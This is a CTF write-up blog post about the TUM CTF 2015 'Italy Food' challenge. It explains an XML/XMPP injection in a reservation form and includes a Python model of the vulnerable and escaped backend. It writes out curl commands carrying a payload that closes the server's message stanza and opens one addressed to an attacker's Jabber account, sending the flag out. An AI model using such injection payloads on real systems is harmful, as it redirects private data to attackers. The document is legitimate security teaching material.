Sunday, October 25, 2015

TUM CTF 2015 - Italy Food (200)





This was a new CTF run by the H4x0rPsch0rr team from the Technische Universität München.
The point system seemed a little off, but overall I had fun with these challenges!

On this one, I primarily targeted higher point challenges in Misc & Web.

"Italy Food" was a challenge about exploiting a restaurant's website.
One team solved it very quickly early in the game, but then nobody else managed it until much later in the day.  It turns out it wasn't the hardest to solve, but it was interesting to work through.


URL: http://1.ctf.link:1120
Description:
Organizing a CTF makes hungry... anyone in for pizza?
Get it while it's hot, hawt, HAWT!!!

1.ctf.link:1120


I started by looking at the Sources tab in Google Chrome's Dev Tools.  There were some custom CSS files, Font Awesome, vendor CSS, vendor JavaScript, and some very simple JS logic for controlling the header menu (probably part of the theme).

In the screenshot above, the "Reservation" tab is the darkest colour.  I hadn't noticed it at first, but it's a fairly obvious hint that this was the target.  I also noticed during the challenge that no other page had any obvious input fields that could be abused.




On this form there is a very clear message telling us how it works:

With our patent pending XMPP reservation 
messaging system, our manager will be 
instantly notified and will respond near 
instantly. Our system will send your 
reservation FLAG right to him!

So the main points here are:

  • XMPP (the protocol being used)
  • The manager will be notified of this message (some Jabber account)
  • It sends the reservation FLAG (the message already carries the flag)


The first thing I try with any web challenge is to find out what input filtering is missing.  My first attempt seemed to work: I filled in each field with reasonable values except the "Message" field, where I put:

abcd
<br>
etc

This returned an error.  Looks like we're onto something!

Fatal error: Uncaught exception 'Fabiang\Xmpp\Exception\XMLParserException' with message 'XML parsing error: "Mismatched tag" at Line 5 at column 63' in /var/www/html/vendor/fabiang/xmpp/src/Exception/XMLParserException.php:68 Stack trace: #0 
/var/www/html/vendor/fabiang/xmpp/src/Stream/XMLStream.php(160): Fabiang\Xmpp\Exception\XMLParserException::create(Resource id #13) #1 
/var/www/html/vendor/fabiang/xmpp/src/Connection/Socket.php(162): Fabiang\Xmpp\Stream\XMLStream->parse('send(Object(ProxyStanza)) #4 {main} thrown in 
/var/www/html/vendor/fabiang/xmpp/src/Exception/XMLParserException.php on line 68


It looks like we've got an XML parsing error.  It also looks like they're using a third-party PHP library called "xmpp" by fabiang (found here - https://github.com/fabiang/xmpp).

After looking into the repository, I found where it was failing.  But I was more interested in how to exploit that failure.  Maybe the xmpp repo could shed some light on how the XML sent to the server is structured.

Searching through the repo, it is very well tested, which means there are also plenty of examples to look at.  The one that helped most was the protocol test for messages - https://github.com/fabiang/xmpp/blob/master/tests/src/Protocol/MessageTest.php#L83

public function testToString()
{
    $this->object->setTo('foobar')->setMessage('testmessage');
    $this->assertRegExp(
        '#<message type="chat" id="fabiang_xmpp_[^"]+" to="foobar"><body>testmessage</body></message>#',
        $this->object->toString()
    );
}



So let's break this down quickly.

The message has a very simple structure:

<message type="chat" id="some_id" to="jabber_id"><body>CONTENT</body></message>

Now, we know the flag is being sent to the manager, and we want the flag... so why not send it to ourselves?  We'll need to get our own Jabber ID into a "to" attribute for that to work.

We'll also assume that the form fields submitted from the restaurant's reservation page are inserted into the body of the message without being escaped; a bare <br> was enough to break the XML, so that seems a safe bet.


Let's also use an easier way of testing each attempt (the bare minimum for the POST request):

curl -XPOST 'http://1.ctf.link:1120/reservation.php' --data 'name=test&message=<br>'

Now let's construct our payload for the submission.

First we need to close the body and message tags the server opened for us:

</body></message>

Then we open a new message and body targeting our own temporary XMPP (Jabber) account:

<message to="attacker@jabb3r.de"><body>

Whatever the server appends after our message field (including the flag) then lands in the body of this second stanza, while the server's own closing tags finish it off.

The whole thing together:

curl -XPOST 'http://1.ctf.link:1120/reservation.php' --data 'name=attacker: &message=</body></message><message to="attacker@jabb3r.de"><body>'
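To make clear why this payload works and what the fix looks like, here is a small model of the vulnerable backend. This is my own added example, not the challenge source and not the fabiang/xmpp library: it assumes the server concatenates the form fields and the flag straight into the stanza (the behaviour we observed), and the manager JID and flag value are placeholders. Parsing the result the way an XMPP stream parser would shows a bare <br> breaking the stream, the injected payload producing a second stanza addressed to the attacker, and XML escaping turning the same payload into inert text.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape, quoteattr

# Assumed placeholders: the real manager JID and flag are not known from the challenge.
MANAGER_JID = "manager@restaurant.example"
ATTACKER_JID = "attacker@jabb3r.de"
FLAG = "hxp{placeholder_flag}"

# The closing/opening sequence used in the write-up, verbatim.
PAYLOAD = '</body></message><message to="attacker@jabb3r.de"><body>'


def build_stanza_vulnerable(name, message):
    """Model of the reservation backend: form fields are concatenated straight
    into the <message> stanza sent to the manager, with the flag appended.
    This is a reconstruction of the observed behaviour, not the challenge source."""
    return ('<message type="chat" id="fabiang_xmpp_1" to="%s">'
            '<body>Reservation from %s: %s %s</body></message>'
            % (MANAGER_JID, name, message, FLAG))


def build_stanza_safe(name, message):
    """Same stanza, but every user-controlled value is XML-escaped (the fix):
    escape() handles text content, quoteattr() handles attribute values."""
    body = escape("Reservation from %s: %s %s" % (name, message, FLAG))
    return ('<message type="chat" id="fabiang_xmpp_1" to=%s><body>%s</body></message>'
            % (quoteattr(MANAGER_JID), body))


def deliveries(stanza_xml):
    """Parse the text as an XMPP stream parser would and return one
    (recipient, body text) pair per <message> element actually present.
    Raises xml.etree.ElementTree.ParseError on malformed XML, which is the
    'Mismatched tag' failure the server showed for a bare <br>."""
    root = ET.fromstring("<stream>%s</stream>" % stanza_xml)
    return [(m.get("to"), m.findtext("body") or "") for m in root.findall("message")]


def is_well_formed(stanza_xml):
    try:
        deliveries(stanza_xml)
        return True
    except ET.ParseError:
        return False


if __name__ == "__main__":
    # 1. A stray tag breaks the stream (the error that leaked the library name).
    print("vulnerable + <br> well-formed:", is_well_formed(build_stanza_vulnerable("test", "<br>")))
    # 2. The injection: the flag ends up in a second stanza addressed to the attacker.
    for to, body in deliveries(build_stanza_vulnerable("attacker", PAYLOAD)):
        print("vulnerable ->", to, repr(body))
    # 3. With escaping there is a single stanza to the manager and the payload is plain text.
    for to, body in deliveries(build_stanza_safe("attacker", PAYLOAD)):
        print("safe       ->", to, repr(body))
```

The check that matters for a fix is not "does the stanza still parse" but "how many <message> elements, and addressed to whom, does the stream parser see"; the escaped version always yields exactly one, addressed to the manager, no matter what the form contains.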

Back on our XMPP client, signed in to the attacker account, we've got the resulting flag:


hxp{we_need_a_xep_for_fastfood_ordering}